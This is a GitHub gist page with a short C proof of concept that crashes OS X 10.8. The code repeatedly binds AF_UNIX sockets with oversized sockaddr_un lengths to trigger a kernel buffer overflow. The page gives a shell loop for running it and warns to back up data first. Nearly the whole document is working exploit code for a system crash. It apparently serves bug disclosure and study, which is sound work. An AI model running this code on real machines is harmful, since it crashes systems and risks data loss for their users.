Skip to content

Instantly share code, notes, and snippets.

@bnoordhuis

bnoordhuis/un.c

Created Feb 8, 2014
Embed
What would you like to do?
PoC of OS X sockaddr_un system crash
// Crashes OS X 10.8, `cc un.c && while :; do ./a.out ; done` to run.
// The buffer overflow usually gets triggered within the first three
// or four runs. Make sure you back up your data first!
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
int main(void) {
struct sockaddr_un *s;
char buf[1024];
size_t len;
int fd;
int rc;
memset(buf, 'a', sizeof(buf));
s = (struct sockaddr_un *) buf;
s->sun_family = AF_UNIX;
for (len = sizeof(*s); len < sizeof(buf); len += 1) {
fd = socket(AF_UNIX, SOCK_STREAM, 0);
assert(fd >= 0);
rc = bind(fd, (struct sockaddr *) s, len);
close(fd);
if (rc) {
perror("bind");
printf("len=%zu\n", len);
break;
}
buf[len] = 0;
unlink(s->sun_path);
buf[len] = 'a';
}
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment